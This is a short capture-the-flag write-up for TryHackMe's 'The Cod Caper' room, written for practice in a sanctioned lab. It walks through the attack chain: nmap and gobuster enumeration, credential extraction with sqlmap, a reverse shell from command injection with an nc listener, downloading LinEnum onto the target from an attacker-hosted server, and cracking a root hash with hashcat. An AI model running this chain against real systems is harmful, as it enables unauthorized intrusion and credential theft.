Open in app

Sign in

Write

Sign in

The Cod Caper -Try Hack Me (Writeup)

Govind Sharma
3 min readApr 29, 2020

Check out the room

https://tryhackme.com/room/thecodcaper

Task 2:

We’ll run the nmap on the target

#nmap -sV -A -p1–1000 -T4 <machine_ip>

Task 3:

As recommended we’ll use the gobuster and link of the wordlist is given in the task

And don’t forget to use the -x flag

#gobuster dir -u <target_url> -w /path/to/wordlist -x “.extension”

Here u have to check for common extension file i.e .html , .php, .txt

Task 4 :

We’ll use the sqlmap for further exploitation

Use the given for the username and password

After running this command we’ll get the username and password for the admin page.

Task 5:

In the previous task we get the login page and using the sqlmap we get the username and password after successful login we’ll the screen like this.

And is a vulnerable to command execution.

Now we’ll the run the nc on our system to get the reverse shell of target machine.

Payloads are given in the link provided in the description of the task

#nc -lnvp 4444

Here my machine will listen to the target machine on the port no. 4444

Now one by one we’ll check the payload by running it on the command column on the above image

Before running the payload modify the IP add and Port

Port will be 4444

Ip add will be on the access page of the THM (Internal Virtual IP add)

Luckily I got the reverse shell on running the first perl payload on this page

https://highon.coffee/blog/reverse-shell-cheat-sheet/

Now on further enumeration, you’ll get the password in the hidden directory .

You will find the in /var/hidden/pass directory by using find command

#find -name pass -type f

Task 6:

Step1: Prepare the Script on Your Attack Machine

# mkdir linenum

# cd linenum/

LinEnum and its script can be found on GitHub

#wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh

#python -m SimpleHTTPServer 4444

Step2: Download the Script on the Target Machine

Login as SSH on the target machine

#ssh pingu@<IP>

pingu@ubuntu$ cd /tmp

pingu@ubuntu$ wget <IP>:4444/LinEnum.sh

pingu@ubuntu$ ls -la

pingu@ubuntu$ chmod +x LinEnum.sh

pingu@ubuntu$ ls -la

pingu@ubuntu$ ./LinEnum.sh

Now look for the SUID files in the results.

Task 10:

Now we have the hash to crack here i have the given hash to root.txt file

We’ll use the hashcat for cracking it

# hashcat -m 1800 -a 0 root.txt /usr/share/wordlists/rockyou.txt

On completing this we’ll have the root password .

Thanks for reading

Tryhackme
Writeup
Walkthrough
Hacking
Linux

--

--

Govind Sharma

Written by Govind Sharma

21 Followers

Computer Engineer and a cyber security enthusiast

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams